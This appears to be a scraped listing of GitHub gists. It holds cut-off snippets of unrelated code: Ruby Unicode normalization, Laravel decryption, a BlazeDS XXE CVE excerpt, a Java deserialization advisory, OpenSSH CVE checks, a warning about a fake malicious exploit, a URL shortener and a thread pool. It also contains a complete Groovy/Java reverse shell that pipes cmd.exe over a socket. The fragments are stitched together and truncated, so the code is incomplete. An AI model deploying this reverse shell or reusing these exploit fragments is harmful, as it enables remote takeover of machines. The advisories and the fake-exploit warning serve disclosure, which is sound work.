@mzsanford
mzsanford / Unicode-normalize-examples.rb
Created July 31, 2009 22:43
Unicode normalization in Ruby sucks
decomposed = "e\xCC\x81"
puts "1: #{decomposed.chars.inspect} // #{decomposed.chars.length}"
puts "2: #{decomposed.chars.normalize(:c).inspect} // #{decomposed.chars.normalize(:c).length}"
puts " 2a: #{decomposed.chars.normalize(:c)[0]}, #{decomposed.chars.normalize(:c)[1]}"
puts " 2b: #{decomposed.chars.normalize(:c).unpack('U*').pack('U')} // #{decomposed.chars.normalize(:c).unpack('U*').pack('U').length}"
puts " 2c: #{decomposed.chars.normalize(:c).unpack('U*').collect{|cp| [cp].pack('U') unless cp.to_s.blank? }} // #{decomposed.chars.normalize(:c).unpack('U*').collect{|cp| [cp].pack('U') unless cp.to_s.blank? }.length}"
puts "3: #{decomposed.chars.normalize(:c).to_s.inspect} // #{decomposed.chars.normalize(:c).to_s.length}"
puts "4: #{decomposed.chars.normalize(:c).to_s.unpack('U'*decomposed.chars.normalize(:c).to_s.length).collect {|x| x.to_s 16}}"
puts "5: #{ActiveSupport::Multibyte::Chars.new(decomposed).length}"
@fideloper
fideloper / crypt.py
Created June 4, 2015 13:52
Decrypt Laravel-encrypted value
import os
import base64
import json
from Crypto.Cipher import AES
from phpserialize import loads
def decrypt(payload):
    data = json.loads(base64.b64decode(payload))
@matthiaskaiser
matthiaskaiser / Amf0Input_readObjectValue.java
Last active March 14, 2019 02:23
CVE-2015-3269: Apache Flex BlazeDS XXE Vulnerability
/* */ public Object readObject()
/* */ throws ClassNotFoundException, IOException
/* */ {
/* 91 */ int type = in.readByte();
/* */
/* 93 */ Object value = readObjectValue(type);
/* 94 */ return value;
/* */ }
/* */
/* */ protected Object readObjectValue(int type) throws ClassNotFoundException, IOException
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.HashSet;
import java.util.Set;
// billion-laughs-style DoS for java serialization
public class SerialDOS {
@frohoff
frohoff / JAVA-ADVISORY.md
Last active August 28, 2023 19:08
Java 7u21 Security Advisory

Security Advisory – Java SE

Chris Frohoff – Qualcomm Information Security and Risk Management

Introduction

  • Affected Product(s): Java SE 6, Java SE 7
  • Fixed in: Java SE 7u25 (2013-06-18), Java SE 8 (2014-03-18)
  • Vendor Contact: secalert_us@oracle.com
  • Vulnerability Type: Unsafe Object Deserialization
@troyxmccall
troyxmccall / openssh-vurlnerability.txt
Last active January 29, 2019 15:11
test client bugs CVE-2016-0777 and CVE-2016-0778
#BAD
$ ssh -v -T git@github.com 2>&1 | grep -E "version|Roaming"
debug1: Local version string SSH-2.0-OpenSSH_7.1
debug1: Remote protocol version 2.0, remote software version libssh-0.7.0
debug1: Roaming not allowed by server # <- PROBLEM HERE
#PATCHED
$ ssh -v -T git@github.com 2>&1 | grep -E "version|Roaming"
debug1: Local version string SSH-2.0-OpenSSH_7.1
debug1: Remote protocol version 2.0, remote software version libssh-0.7.0
@alexanderkent
alexanderkent / CVE-2016-0777
Created January 16, 2016 15:53
CVE-2016-0777 roaming openssh exploit
http://pastebin.com/T2zjAdZ5
A quick warning: this fake exploit going around is entirely malicious, and will not exploit the bug, but instead do
bad things to your machine.
If you actually read it, on lines 59 and 60, you'll see this:
(*(void(*)())shellcode)();
exit(1);
This runs the "shellcode" on your own box. Since it requires root to run (because, it says,
@frohoff
frohoff / revsh.groovy
Created March 2, 2016 18:55
Pure Groovy/Java Reverse Shell
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
@magician11
magician11 / google-url-shortener.js
Last active September 18, 2023 14:39
How to use Request with the Google URL Shortener API.
const request = require('request');
const GOOGLE_API_KEY = 'your api key'; // from https://console.developers.google.com/apis/credentials
const urlToShorten = 'http://www.thelongurltoshorten.com';
const shortenerUrl = `https://www.googleapis.com/urlshortener/v1/url?key=${GOOGLE_API_KEY}`;
const options = {
  uri: shortenerUrl,
  json: {
    longUrl: urlToShorten
@rosenfeld
rosenfeld / thread-pool.rb
Created June 7, 2016 12:49
Simple thread pool implementation in Ruby
require 'thread' # for Mutex: Ruby doesn't provide out of the box thread-safe arrays
class ThreadPool
  def initialize(max_threads = 10)
    @pool = SizedQueue.new(max_threads)
    max_threads.times{ @pool << 1 }
    @mutex = Mutex.new
    @running_threads = []
  end